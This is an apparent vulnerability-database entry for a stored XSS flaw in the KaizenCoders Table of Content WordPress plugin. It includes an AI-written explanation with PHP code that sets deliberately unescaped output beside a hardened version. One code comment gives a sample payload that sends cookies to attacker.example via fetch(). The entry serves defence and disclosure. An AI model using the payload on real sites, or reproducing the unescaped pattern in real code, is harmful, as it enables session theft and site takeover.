CVE-2025-58857
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in KaizenCoders Table of content (content-table) allows Stored XSS. This issue affects Table of content: from n/a through <= 1.5.3.1.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS in the KaizenCoders Table of Content plugin (≤ 1.5.3.1) lets an attacker persist a script payload on the site that executes in the browser of any higher-privileged user who later views the affected page.
The KaizenCoders Table of Content WordPress plugin (slug content-table), versions up to and including 1.5.3.1, suffers from a stored cross-site scripting (XSS) vulnerability tracked as CVE-2025-58857. The root cause is improper neutralization of user-supplied input during web page generation: a value the plugin accepts and stores on the server is later written back into HTML without escaping, so arbitrary script code is persisted and rendered as markup [1].
Exploitation requires an account that can submit the affected input through the plugin (the CVE description does not state which role is needed; for WordPress plugin XSS this is commonly a contributor- or editor-level user). The stored script then executes in the browser of any higher-privileged user, such as an administrator, who views the affected page; no interaction beyond loading the page is required [1].
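To make the root cause concrete, the following is an added illustration of the generic WordPress pattern behind a stored XSS in a plugin settings page, shown beside a hardened form. This is not code from the KaizenCoders plugin (its source is not on this page); the option name `ct_heading_text`, the settings group `ct_options`, the function names and the text domain are placeholders invented for the example.

```php
<?php
// Added illustration, NOT the plugin's own code. All option, group and
// function names below are invented for the example.

// --- Vulnerable pattern: a stored setting is echoed back unescaped. -----------
// A user who can reach this page submits a value such as
//   <img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)">
// It is saved verbatim and runs in the browser of every admin who later opens the page.
function ct_vuln_render_settings() {
    $heading = get_option( 'ct_heading_text', '' );   // raw value from the database
    echo '<h2>' . $heading . '</h2>';                  // text context, no escaping: stored XSS
    echo '<input type="text" name="ct_heading_text" value="' . $heading . '">'; // attribute context, also unescaped
}

// --- Hardened pattern: sanitize on save, escape on output, gate by capability and nonce. ---
function ct_safe_register_settings() {
    register_setting( 'ct_options', 'ct_heading_text', array(
        'type'              => 'string',
        'sanitize_callback' => 'sanitize_text_field', // strips tags and control characters on save
        'default'           => '',
    ) );
}
add_action( 'admin_init', 'ct_safe_register_settings' );

function ct_safe_render_settings() {
    // Only administrators (or whoever holds the capability) may view/change the option.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You do not have permission to access this page.', 'ct-example' ) );
    }
    $heading = get_option( 'ct_heading_text', '' );

    // Escape for the context the value lands in, even though it was sanitized on save:
    // other write paths (imports, WP-CLI, direct DB edits) can still store raw HTML.
    echo '<h2>' . esc_html( $heading ) . '</h2>';
    echo '<form method="post" action="options.php">';
    settings_fields( 'ct_options' ); // emits the nonce and hidden fields options.php verifies
    echo '<input type="text" name="ct_heading_text" value="' . esc_attr( $heading ) . '">';
    submit_button();
    echo '</form>';
}
```

The fix has two halves and both matter: `sanitize_text_field` in the `sanitize_callback` stops tags being stored through this form, and `esc_html`/`esc_attr` at output time protect the page regardless of how the option got into the database. A plugin that only sanitizes on input, or only escapes in one of the two contexts (text node versus attribute value), leaves the stored-XSS path open.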
A successful attack can lead to session hijacking, defacement, or redirection to malicious sites. Because the payload runs with the victim's authenticated session, an administrator's cookies or nonces can be stolen and actions performed on their behalf (creating users, installing plugins, editing theme files), which turns a client-side bug into compromise of the entire WordPress installation [1].
Patched versions are not explicitly mentioned in the reference; updating the plugin to the latest available release as soon as one is published is strongly recommended. Until then, administrators should restrict the roles that can submit content to the plugin to trusted users and may deploy a Web Application Firewall (WAF) as a stopgap, bearing in mind that signature-based WAF rules only catch known payload patterns and do not fix the missing output escaping [1].
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 1
Patches: 0 (no patches discovered yet)
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References: 1
News mentions: 0 (no linked articles in our index yet)